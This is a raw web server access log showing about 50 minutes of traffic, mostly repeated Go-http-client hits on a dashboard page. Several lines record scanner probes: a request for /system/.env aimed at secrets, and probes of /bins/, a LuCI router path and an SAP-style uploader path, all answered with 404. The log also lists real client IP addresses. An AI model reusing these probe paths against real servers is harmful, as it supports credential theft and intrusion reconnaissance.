78.153.140.203 - - [08/Nov/2025:00:17:46 +0300] "GET /system/.env HTTP/1.1" 404 299
44.201.177.43 - - [08/Nov/2025:00:18:06 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:00:18:06 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
91.232.238.112 - - [08/Nov/2025:00:25:06 +0300] "GET / HTTP/1.0" 400 468
3.145.49.236 - - [08/Nov/2025:00:25:15 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:00:25:16 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.18 - - [08/Nov/2025:00:25:33 +0300] "GET /bins/ HTTP/1.1" 404 298 "-" "-"
13.89.125.255 - - [08/Nov/2025:00:27:33 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 299
3.146.107.169 - - [08/Nov/2025:00:30:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:00:30:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [08/Nov/2025:00:31:06 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [08/Nov/2025:00:31:15 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
44.201.177.43 - - [08/Nov/2025:00:36:11 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:00:36:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
91.232.238.112 - - [08/Nov/2025:00:38:54 +0300] "GET /robots.txt HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:00:39:40 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:00:39:40 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
85.11.167.4 - - [08/Nov/2025:00:51:35 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [08/Nov/2025:00:51:36 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [08/Nov/2025:00:51:36 +0300] "GET /dashboard/javascripts/modernizr.js HTTP/1.1" 200 51365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [08/Nov/2025:00:51:36 +0300] "GET //code.jquery.com/jquery-1.10.2.min.js HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [08/Nov/2025:00:51:36 +0300] "GET /dashboard/javascripts/all.js HTTP/1.1" 200 188385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
3.146.107.169 - - [08/Nov/2025:00:55:46 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:00:55:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:00:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:00:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:01:08:22 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
